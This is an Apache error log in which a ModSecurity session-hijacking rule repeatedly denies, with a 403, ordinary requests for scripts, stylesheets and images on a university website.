[Mon Aug 28 09:06:13.932838 2023] [:error] [pid 38763] [client 114.122.110.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "tpa-online.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBFcCo-f0AAJdrnmsAAAAK"]
[Mon Aug 28 09:06:27.272984 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOwBI8Co-f0AAJd1foUAAAAE"]
[Mon Aug 28 09:06:27.273660 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOwBI8Co-f0AAJdtodoAAAAO"]
[Mon Aug 28 09:06:27.309010 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOwBI8Co-f0AAJdscKsAAAAM"]
[Mon Aug 28 09:06:27.331984 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOwBI8Co-f0AAJdrnm0AAAAK"]
[Mon Aug 28 09:06:27.358495 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOwBI8Co-f0AAJcg6gQAAAAD"]
[Mon Aug 28 09:06:27.359249 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOwBI8Co-f0AAJdscKwAAAAM"]
[Mon Aug 28 09:06:27.363238 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOwBI8Co-f0AAJd2kdcAAAAH"]
[Mon Aug 28 09:06:27.366124 2023] [:error] [pid 38769] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOwBI8Co-f0AAJdxrT4AAAAS"]
[Mon Aug 28 09:06:27.475224 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOwBI8Co-f0AAJdwdPIAAAAA"]
[Mon Aug 28 09:06:27.488049 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOwBI8Co-f0AAJd1foYAAAAE"]
[Mon Aug 28 09:06:27.528863 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOwBI8Co-f0AAJcb5AwAAAAP"]
[Mon Aug 28 09:06:27.529076 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOwBI8Co-f0AAJdrnm4AAAAK"]
[Mon Aug 28 09:06:27.529417 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOwBI8Co-f0AAJdtodsAAAAO"]
[Mon Aug 28 09:06:27.534271 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOwBI8Co-f0AAJd0nlkAAAAC"]
[Mon Aug 28 09:06:27.540208 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOwBI8Co-f0AAJd2kdgAAAAH"]
[Mon Aug 28 09:06:27.575831 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOwBI8Co-f0AAJdscK0AAAAM"]
[Mon Aug 28 09:06:27.584225 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOwBI8Co-f0AAJcb5A0AAAAP"]
[Mon Aug 28 09:06:27.584632 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOwBI8Co-f0AAJdrnm8AAAAK"]
[Mon Aug 28 09:06:27.591586 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOwBI8Co-f0AAJdtodwAAAAO"]
[Mon Aug 28 09:06:27.591920 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOwBI8Co-f0AAJd2kdkAAAAH"]
[Mon Aug 28 09:06:27.621713 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOwBI8Co-f0AAJd1focAAAAE"]
[Mon Aug 28 09:06:27.625250 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOwBI8Co-f0AAJcb5A4AAAAP"]
[Mon Aug 28 09:06:27.626234 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOwBI8Co-f0AAJdrnnAAAAAK"]
[Mon Aug 28 09:06:27.627257 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOwBI8Co-f0AAJdscK4AAAAM"]
[Mon Aug 28 09:06:27.636853 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOwBI8Co-f0AAJdtod0AAAAO"]
[Mon Aug 28 09:06:27.673197 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOwBI8Co-f0AAJd2kdoAAAAH"]
[Mon Aug 28 09:06:27.677147 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOwBI8Co-f0AAJd0nloAAAAC"]
[Mon Aug 28 09:06:27.677349 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOwBI8Co-f0AAJdwdPMAAAAA"]
[Mon Aug 28 09:06:27.677577 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOwBI8Co-f0AAJcg6gUAAAAD"]
[Mon Aug 28 09:06:27.680018 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOwBI8Co-f0AAJdrnnEAAAAK"]
[Mon Aug 28 09:06:27.682110 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOwBI8Co-f0AAJdscK8AAAAM"]
[Mon Aug 28 09:06:27.733708 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOwBI8Co-f0AAJcb5A8AAAAP"]
[Mon Aug 28 09:06:27.735749 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOwBI8Co-f0AAJd1fogAAAAE"]
[Mon Aug 28 09:06:27.736613 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOwBI8Co-f0AAJd2kdsAAAAH"]
[Mon Aug 28 09:06:27.737396 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOwBI8Co-f0AAJdscLAAAAAM"]
[Mon Aug 28 09:06:27.745665 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOwBI8Co-f0AAJdwdPQAAAAA"]
[Mon Aug 28 09:06:27.747941 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOwBI8Co-f0AAJcg6gYAAAAD"]
[Mon Aug 28 09:06:27.782477 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOwBI8Co-f0AAJdtod4AAAAO"]
[Mon Aug 28 09:06:27.790673 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOwBI8Co-f0AAJdscLEAAAAM"]
[Mon Aug 28 09:06:27.944467 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/register-online.jpg"] [unique_id "ZOwBI8Co-f0AAJd0nlsAAAAC"]
[Mon Aug 28 09:06:27.945364 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOwBI8Co-f0AAJdrnnIAAAAK"]
[Mon Aug 28 09:06:27.945591 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOwBI8Co-f0AAJcg6gcAAAAD"]
[Mon Aug 28 09:06:28.010821 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/images/bg45.png"] [unique_id "ZOwBJMCo-f0AAJdscLIAAAAM"]
[Mon Aug 28 09:06:28.013535 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/logo.png"] [unique_id "ZOwBJMCo-f0AAJd2kdwAAAAH"]
[Mon Aug 28 09:06:28.014400 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/images/bg4.jpg"] [unique_id "ZOwBJMCo-f0AAJd1fokAAAAE"]
[Mon Aug 28 09:06:28.014560 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/menu/bgmenu.png"] [unique_id "ZOwBJMCo-f0AAJcb5BAAAAAP"]
[Mon Aug 28 09:06:28.060792 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOwBJMCo-f0AAJdscLMAAAAM"]
[Mon Aug 28 09:06:28.060792 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOwBJMCo-f0AAJdwdPUAAAAA"]
[Mon Aug 28 09:06:28.072345 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/foot/favs2.png"] [unique_id "ZOwBJMCo-f0AAJdtod8AAAAO"]
[Mon Aug 28 09:06:28.094530 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOwBJMCo-f0AAJd2kd0AAAAH"]
[Mon Aug 28 09:06:28.094593 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOwBJMCo-f0AAJcb5BEAAAAP"]
[Mon Aug 28 09:06:28.109702 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOwBJMCo-f0AAJdrnnMAAAAK"]
[Mon Aug 28 09:06:28.126746 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOwBJMCo-f0AAJdwdPYAAAAA"]
[Mon Aug 28 09:06:28.126831 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOwBJMCo-f0AAJdscLQAAAAM"]
[Mon Aug 28 09:06:28.144553 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOwBJMCo-f0AAJcb5BIAAAAP"]
[Mon Aug 28 09:06:28.548627 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBJMCo-f0AAJdtoeAAAAAO"]
[Mon Aug 28 09:06:52.216343 2023] [:error] [pid 38773] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOwBPMCo-f0AAJd1fooAAAAE"]
[Mon Aug 28 09:06:52.301410 2023] [:error] [pid 38768] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBPMCo-f0AAJdwdPcAAAAA"]
[Mon Aug 28 09:07:00.991356 2023] [:error] [pid 38769] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwBRMCo-f0AAJdxrT8AAAAS"]
[Mon Aug 28 09:07:01.341097 2023] [:error] [pid 38774] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBRcCo-f0AAJd2kd8AAAAH"]
[Mon Aug 28 09:07:10.403155 2023] [:error] [pid 38769] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBTsCo-f0AAJdxrUAAAAAS"]
